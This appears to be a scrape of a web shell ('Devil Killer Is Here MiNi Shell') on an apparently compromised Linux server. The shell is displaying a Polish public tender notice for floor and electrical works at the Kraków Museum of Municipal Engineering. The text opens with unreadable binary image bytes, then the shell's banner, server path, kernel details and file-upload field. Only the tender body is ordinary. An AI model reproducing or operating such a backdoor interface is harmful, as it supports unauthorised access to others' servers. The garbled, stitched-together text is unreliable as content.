JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211221/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211221/0032560001-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie robót budowlanych polegających na dostosowaniu posadzki w hali E do pełnienia<br/>funkcji sali wystawienniczej dla ekspozycji stałej w siedzibie Muzeum Inżynierii Miejskiej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Muzeum Inżynierii Miejskiej w Krakowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 351535611</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Św. Wawrzyńca</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-060</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">muzeum@mim.krakow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mim.krakow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie robót budowlanych polegających na dostosowaniu posadzki w hali E do pełnienia<br/>funkcji sali wystawienniczej dla ekspozycji stałej w siedzibie Muzeum Inżynierii Miejskiej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-58f7bf9e-625b-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00325600</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00010965/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Adaptacja hali E na potrzeby wystawy stałej w zakresie instalacji elektrycznej, teletechnicznej i naprawy podłogi</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.bip.krakow.pl/?bip_id=316&amp;mmi=11058 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://www.bip.krakow.pl/?<br/>bip_id=316&amp;mmi=11058<br/>Miniportal UZP: https://miniportal.uzp.gov.pl/,<br/>ePUAP: https://obywatel.gov.pl/nforms/ezamowienia</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>niniejszym postępowaniu komunikacja odbywa się przy użyciu miniPortalu<br/>https://miniportal.uzp.gov.pl/, ePUAPu https://obywatel.gov.pl/nforms/ezamowienia oraz poczty<br/>elektronicznej na adres: muzeum@mim.krakow.pl<br/>2. Wykonawca zamierzający wziąć udział w niniejszym postępowaniu, musi posiadać konto na ePUAP.<br/>3. Wykonawca składa tylko jedną ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania<br/>oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu. Wraz z<br/>formularzem należy złożyć pozostałe dokumenty wskazane w pkt 6.1.1. – 6.1.5. SWZ.<br/>UWAGA!<br/>Uwaga! Wykonawca winien zapoznać się z wytycznymi Urzędu Zamówień Publicznych<br/>udostępnionymi na https://www.uzp.gov.pl/strona-glowna/slider-aktualnosci/jak-nalezypodpisacofertewpostacielektronicznej/<br/>jak-nalezy-podpisac-oferte-w postaci-elektronicznej Zgodnie z ww.<br/>wytycznymi podpis składany wyłącznie na ww. „Formularzu do złożenia, zmiany, wycofania oferty lub<br/>wniosku” nie wywołuje skutków w odniesieniu do złożonej za jego pomocą oferty Wykonawcy. Oferta<br/>bowiem, zgodnie z art. 63 ustawy, a nie ww. formularz elektroniczny za pośrednictwem którego jest<br/>przekazywana, musi zostać opatrzona właściwym podpisem. W zakresie procedury podpisywania<br/>oferty odpowiednim podpisem, czyli składania właściwego podpisu pod ofertą złożoną w postaci<br/>elektronicznej wskazać należy, iż prawidłowym będzie złożenie oferty w ten sposób, że Wykonawca<br/>przekazuje Zamawiającemu zaszyfrowany plik zawierający ofertę opatrzoną właściwym podpisem lub<br/>plik oferty wraz z plikiem podpisu (w przypadku podpisu zewnętrznego), przy czym opatrzenie oferty<br/>podpisem nastąpiło przed zaszyfrowaniem oferty. Dopuszczalne jest również, aby Wykonawca<br/>przekazał Zamawiającemu swoją ofertę w tzw. „paczce” dokumentów elektronicznych (tj. w skompresowanym archiwum dokumentów elektronicznych, które najczęściej zapisane jest w formacie<br/>ZIP) wraz z właściwym podpisem dołączonym jako plik podpisu do paczki dokumentów<br/>elektronicznych przed jej zaszyfrowaniem, o czym wprost stanowi § 8 Rozporządzenia, o którym mowa<br/>w pkt 8.4. SWZ. Zatem podpis może zostać złożony bezpośrednio na pliku z ofertą Wykonawcy lub na<br/>„paczce” dokumentów elektronicznych zawierających ofertę Wykonawcy. Opatrzenie właściwym<br/>podpisem oferty (lub paczki) następuje przed czynnością jej zaszyfrowania. Złożenie podpisu jedynie<br/>na „Formularzu do złożenia, zmiany, wycofania oferty lub wniosku” nie jest równoznaczne ze<br/>złożeniem podpisu pod ofertą. Oferta, która została złożona bez opatrzenia właściwym podpisem<br/>elektronicznym podlega odrzuceniu na podstawie art. 226 ust. 1 pkt 3 ustawy z uwagi na niezgodność<br/>z art. 63 ustawy.<br/>4. Sposób złożenia oferty, w tym zaszyfrowania oferty, opisany został w „Instrukcji użytkownika<br/>systemu miniPortal oraz Regualminie ePUAP”.<br/>5. Identyfikator postępowania został wskazany w pkt 2. SWZ.<br/>6. W Formularzu Oferty Wykonawca zobowiązany jest podać adres skrzynki ePUAP oraz poczty<br/>elektronicznej poprzez które Zamawiający będzie komunikował się z Wykonawcą.<br/>7. Wykonawca może przed upływem terminu do składania ofert wycofać ofertę za pośrednictwem<br/>„Formularza do złożenia, zmiany, wycofania oferty lub wniosku”. Sposób wycofania oferty został<br/>opisany w „Instrukcji użytkownika systemu miniPortal-ePUAP”.<br/>8. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów, informacji i oświadczeń<br/>oraz ich cyfrowych odwzorowań (w tym tzw. kopii elektronicznych) opisane zostały w Regulaminie<br/>korzystania z miniPortalu oraz Regulaminie ePUAP<br/>9. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do:<br/>„złożenia, zmiany, wycofania oferty lub wniosku” oraz „komunikacji” wynosi 150 MB, a plików<br/>przesyłanych za pośrednictwem poczty elektronicznej wynosi 40 MB.<br/>c.d. w Informacjach dodatkowych i w pkt 9 SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1) dalej „RODO” informujemy, że:<br/>• administratorem danych osobowych przekazanych przez Wykonawcę jest:<br/>1) Zamawiający – Muzeum Inżynierii Miejskiej w Krakowie, z siedzibą ul. Św. Wawrzyńca 15, 31-060<br/>Kraków tel: 12 428 66 00 e-mail w sprawie danych osobowych: iod@mimk.com.pl;<br/>• przetwarzanie danych osobowych przez Zamawiającego jest niezbędne dla celów wynikających z<br/>prawnie uzasadnionych interesów realizowanych przez Zamawiającego i wypełnienia obowiązku<br/>prawnego ciążącego na administratorze;,<br/>• podstawa prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. b i c RODO w celu związanym<br/>z postępowaniem przetargowym prowadzonym w trybie przetargu nieograniczonego na podstawie art.<br/>39 i następne ustawy Pzp,<br/>• dane osobowe będą ujawniane wykonawcom oraz wszystkim zainteresowanym, a także podmiotom<br/>przetwarzającym dane na podstawie zawartych umów,<br/>• dane osobowe Oferenta będą przechowywane przez okres obowiązywania umowy a następnie 5 lat,<br/>od 1 stycznia roku kalendarzowego następującego po zakończeniu okresu obowiązywania umowy.<br/>Okresy te dotyczą również Oferentów, którzy złożyli oferty i nie zostały one uznane, jako<br/>najkorzystniejsze,<br/>• w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO,<br/>osobie, której dane dotyczą przysługuje:<br/>1) na podstawie art. 15 RODO prawo dostępu do jej danych osobowych,<br/>2) na podstawie art. 16 RODO prawo do sprostowania jej danych osobowych,<br/>3) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO,<br/>4) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, (Biuro Generalnego<br/>Urzędu Ochrony Danych Osobowych, ul Stawki 2, 00-193 Warszawa);<br/>• osobie, której dane dotyczą nie przysługuje:<br/>1) w związku z art. 17 ust. 3 lit. b lub d lub e RODO prawo do usunięcia danych osobowych,<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>3) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>24.2 Wykonawcy zobowiązani są do dochowania obowiązku informacyjnego, o którym mowa w art. 13 i<br/>14 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w<br/>sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE w stosunku do osób,<br/>których dane osobowe przekazał w związku z udziałem w postepowaniu przetargowym.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DOT.26.51.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.1. Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na<br/>dostosowaniu posadzki w hali E do pełnienia funkcji sali wystawienniczej dla ekspozycji stałej<br/>oraz wykonanie instalacji elektrycznej. Hala E wchodzi w kompleks budynków znajdujących się<br/>przy ul. św. Wawrzyńca 15 w Krakowie.<br/>3.2. Opis stanu istniejącego:<br/>3.2.1. Wierzchnia warstwa posadzki to lita powłoka przypominająca farbę do pokrywania<br/>nawierzchni betonowych lub jedną warstwę cienkowarstwowej posadzki epoksydowej. Widoczne<br/>podziały prostopadłe do dłuższych boków hali (oddzielania dylatacyjne pól lub kolejne pola<br/>prac).<br/>3.2.2. W dokumentacji projektowej określono zakres koniecznych przerw dylatacyjnych -<br/>dylatacje &#34;od ścian oraz w osiach - podłużnych i poprzecznych słupów<br/>3.2.3. w środkowych. Wykonać 2 szczeliny przeciwskurczowe w każdym polu&#34;. Widoczne są<br/>podziały, ich charakter zostanie ostatecznie ujawniony po usunięciu wierzchniej warstwy<br/>posadzki.<br/>3.2.4. Stan faktyczny przekrycia kanałów - deski oparte na dwóch biegnących równolegle<br/>kątownikach.<br/>3.3. Zakres prac:<br/>3.3.1. Usunięcie (poprzez zdarcie - szlifowanie) istniejącej powłoki cienkowarstwowej i<br/>wykonanie nowej instalacji elektrycznej (zgodnie z przygotowaną dokumentacją) wraz z<br/>usunięciem starej instalacji elektrycznej (niepotrzebne elementy starego zasilania widoczne na<br/>powierzchni posadzki). Prace należy rozpocząć od usunięcia (poprzez zdarcie - szlifowanie)<br/>istniejącej powłoki cienkowarstwowej. Wykonanie tej czynności pozwoli prawidłowo i ostatecznie<br/>ocenić stan podłoża (wylewki), rozmieszczenie przerw dylatacyjnych i stwierdzić ostatecznie czy<br/>i jaki jest zakres koniecznych prac naprawczych. Po wstępnym oczyszczeniu podłoża należy<br/>wykonać nową instalację zasilania w energię elektryczną. Rozprowadzenie instalacji planowane<br/>jest w bruzdach wyciętych<br/>w istniejącej wylewce. Bruzdy instalacyjne o szerokości ok. 150mm zostaną wycięte zgodnie z<br/>rozplanowaniem przedstawionym w przygotowanej dokumentacji projektowej branży<br/>elektrycznej.<br/>3.3.2. Naprawy, uzupełnienia, wzmocnienie jednolitości i wyrównanie podłoża, czyli<br/>przygotowanie istniejącego podłoża do połączenia z nowymi warstwami posadzki. Konieczna<br/>będzie kontrola rozmieszczenia przerw dylatacyjnych<br/>i uzupełnienia lub naprawy na powierzchni równej 10-15% powierzchni całkowitej hali<br/>(wypełnienia bruzd nowej instalacji zasilania elektrycznego, odspojenia, pęknięcia i ubytki<br/>ujawnione po zdarciu wierzchniej warstwy starej posadzki). Całość bruzd, braków i ubytków po<br/>wykonaniu warstwy łączącej (gruntowanie) wypełnić masą do reperacji (na bazie cementu) i<br/>wzmocnić<br/>w miejscach szczególnie narażonych na oddzielenie (pękanie) dwoma warstwami siatki z włókna<br/>szklanego. Na tak przygotowanym, uzupełnionym podłożu należy po powtórnym zagruntowaniu<br/>całości wykonać cienkowarstwową samopoziomującą wylewkę o składzie zapewniającym<br/>połączenie z istniejącym podłożem.<br/>3.3.3. Wykonanie nowej nawierzchni i nowych pokryć kanałów instalacyjnych. Posadzka wg<br/>klasyfikacji posadzek żywicznych na podstawie zaleceń FeRFA (The Resin Floor Association) i<br/>BS 8204-6 zaleca się wykonanie posadzki epoksydowo-poliuretanowej sklasyfikowanej w tabeli<br/>klasyfikacji posadzek w poz. 4 lub 5, są to posadzki wielowarstwowe, malowane lub wylewane z<br/>warstwami z posypki<br/>a kruszyw między warstwami żywicy - o grubości posadzki powyżej 2mm (max. 4mm). Zgodnie z<br/>tabelą klasyfikacji posadzek, nawierzchnia ma zapewnić łatwość utrzymania, być<br/>antypoślizgowa, posiadać dobrą odporność na ścieranie, obciążenia udarowe i krótkotrwałe<br/>zanieczyszczenia chemikaliami. Użytkowanie w przedziale od -5 do + 40 st. C. Warstwa dolna -<br/>żywica epoksydowa modyfikowana komponentem poliuretanowym - zapewnia dużą<br/>elastyczność, warstwa wierzchnia w postaci modyfikowanego utwardzacza zapewnia odporność<br/>na ścieranie.<br/>W zakresie antypoślizgowości (brak polskich norm) wykorzystując przepisy niemieckie zaleca<br/>się uzyskanie wskaźnika (kąt poślizgu) oznaczonego wg DIN51130 jako R11, a wg DIN51097<br/>jako B lub C, o kącie poślizgu w przedziale 19-27 stopni. Dopuszcza sie zastosowanie posadzki<br/>oznaczonej wg DIN51130 jako R10, a wg DIN51097 jako A lub B, o kącie poślizgu w przedziale<br/>10 - 19 stopni.<br/>Posadzka powinna składać się z następujących warstw:<br/>- kompozycji gruntującej,<br/>- posypki z piasku kwarcowego,<br/>- kompozycji podstawowej,<br/>- posypki kwarcowej lub korundowej,<br/>- powłoki zamykającej.<br/>Ponieważ gruntowanie umieszczono w czynnościach przygotowawczych należy zwrócić uwagę<br/>na konieczność doboru gruntu zgodnego<br/>z podstawowymi warstwami posadzki.<br/>Przykładowa technologia wykonania posadzki zakłada następujące czynności:<br/>- przygotowanie podłoża (szlifowanie, frezowanie lub piaskowanie),<br/>- nałożenie żywicy gruntującej,<br/>- posypanie piaskiem kwarcowym,<br/>- usunięcie niezwiązanego, luźnego piasku kwarcowego,<br/>- nałożenie wodoszczelnej zaprawy żywicznej z ręcznym lub mechanicznym zatarciem,<br/>- nałożenie wałkiem warstwy żywicy,<br/>- posypanie piaskiem kwarcowym (lub korundowym) z nadmiarem,<br/>- usunięcie niezwiązanego, luźnego piasku kwarcowego,<br/>- zamknięcie powierzchni przez nałożenie warstwy barwnej żywicy.<br/>Elementem dopełniającym część posadzki są pokrywy zamykające kanał instalacyjny. Zaleca<br/>się zastąpienie istniejącego wypełnienia z desek pokrytych farbą panelami o konstrukcji stalowej<br/>wypełnionej dwoma warstwami płyty OSB z powierzchniowym wykończeniem warstwami<br/>posadzki epoksydowo-poliuretanowej (identycznej jak w pozostałej części hali). Sposób<br/>wykonania<br/>i detale na załączonych rysunkach. Rysunki pokazują podstawowy element wypełnienia. Biorąc<br/>pod uwagę przebieg kanałów i możliwe zmiany wymiarów - przed przystąpieniem do prac należy<br/>wykonać szczegółowy pomiar dla każdego odcinka kanału. Lokalizację paneli z uchwytami<br/>umożliwiającymi podniesienie pokryw należy dostosować do aranżacji wystawy stałej.<br/>3.3.4. Instalacja elektryczna<br/>Instalację elektryczną należy wykonać zgodnie z projektem wykonawczym pt: „Projekt instalacji<br/>elektrycznej w hali E, oraz systemu sterowania oświetleniem DALI do zamontowanego w<br/>budynkach D, E, L i H przy ul. św. Wawrzyńca 15<br/>w Krakowie oświetlenia roboczego i oświetlenia wystawy stałej” w zakresie obejmującym jedynie<br/>halę E. Z zakresu prac, opisanych w pkt 2.5 „Budynek E. Zasilanie w energię elektryczną” i 2.6<br/>„Budynek E. Instalacje oświetlenia i gniazd wtykowych” opisu technicznego oraz przedmiaru<br/>zostają wyłączone elementy sterujące systemy DALI (routery i pulpity sterujące). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45247270-3 - Budowa zbiorników</p> <p class="mb-0">45262330-3 - Roboty w zakresie naprawy betonu</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45314000-1 - Instalowanie urządzeń telekomunikacyjnych</p> <p class="mb-0">45316000-5 - Instalowanie systemów oświetleniowych i sygnalizacyjnych</p> <p class="mb-0">45343000-3 - Roboty instalacyjne przeciwpożarowe</p> <p class="mb-0">45432112-2 - Kładzenie nawierzchni</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">70 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">cena-waga 100%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W postępowaniu mogą wziąć udział Wykonawcy, którzy – zgodnie 